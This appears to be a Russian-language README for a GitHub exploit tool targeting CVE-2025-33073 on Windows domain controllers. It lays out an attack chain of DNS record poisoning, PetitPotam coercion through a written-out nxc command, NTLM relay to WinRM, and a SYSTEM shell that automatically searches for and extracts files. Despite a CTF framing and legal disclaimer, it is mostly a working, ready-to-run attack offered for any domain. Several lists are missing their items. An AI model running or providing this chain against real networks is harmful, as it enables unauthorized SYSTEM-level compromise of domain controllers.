
Универсальный инструмент эксплуатации для CVE-2025-33073, нацеленный на контроллеры домена Windows с привилегиями DNSAdmins и включённым WinRM.

Универсальный инструмент эксплуатации для CVE-2025-33073, ориентированный на контроллеры доменов Windows с привилегиями DNSAdmins и включённым WinRM.
CVE-2025-33073 — это критическая уязвимость, которая позволяет атакующим получить выполнение кода на уровне SYSTEM на контроллерах доменов Windows через комбинацию:
Данный PoC предоставляет универсальный, автоматизированный фреймворк эксплуатации, совместимый с любым доменом, любым именем пользователя и любой средой CTF.
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
Скрипт запросит:
Терминал 1 — Запуск эксплойта:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
Терминал 2 — Выполнение команды принуждения (скопируйте из вывода Терминала 1):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
Результат:
Скрипт автоматически ищет и извлекает:
*flag*.txt*root*.txt*user*.txtproof.txtРасположение: C:\Users\*\Desktop\
Все выходные данные сохраняются в: /0pwn_exploit_<TIMESTAMP>/
relay.log — Вывод NTLM-ретрансляционного сервераdns.log — Логи DNS-операцийshell_output.log — Команды оболочки и извлечённые флаги1. DNS-отравление (krbrelayx.dnstool)
└─> Изменить/создать DNS-запись, указывающую на IP атакующего
2. NTLM-ретрансляционный сервер (ntlmrelayx.py)
└─> Ожидание входящей NTLM-аутентификации
3. Принуждение (nxc + PetitPotam)
└─> Принудить DC аутентифицироваться на IP атакующего
4. Ретрансляция → WinRM
└─> Ретрансляция аутентификации на целевой WinRM
5. Оболочка SYSTEM
└─> Выполнение команд от имени SYSTEM
6. Автоизвлечение флагов
└─> Поиск и извлечение всех флагов
Отредактируйте переменную LONGHOST в exploit.sh:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
Измените функцию run_shell_commands() для поиска других шаблонов файлов:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
Данный PoC предоставляется для:
Несанкционированный доступ к компьютерным системам незаконен.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log на наличие ошибокnc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()/0pwn_exploit_1234567890/
├── relay.log # Вывод NTLM-ретрансляционного сервера
├── dns.log # Детали DNS-операций
└── shell_output.log # Извлечённые флаги и вывод команд
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# Check DNS operations
cat /0pwn_exploit_*/dns.log
[Демонстрация и скриншоты] — [Скоро]

0pwn (uziii2208) — оригинальная концепция и исследование AI Enhanced — улучшения v1.0 и автоизвлечение флагов
Лицензия MIT — подробности в файле LICENSE
ЮРИДИЧЕСКОЕ УВЕДОМЛЕНИЕ:
Данное программное обеспечение предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен и наказуем по закону.
Используя данный инструмент, вы соглашаетесь:
Приветствуются вклады! Пожалуйста, создавайте issues и pull requests.
По вопросам, проблемам или улучшениям:
Статус: ✅ Протестировано и подтверждено Версия: 1.0 (Универсальная) Последнее обновление: 2025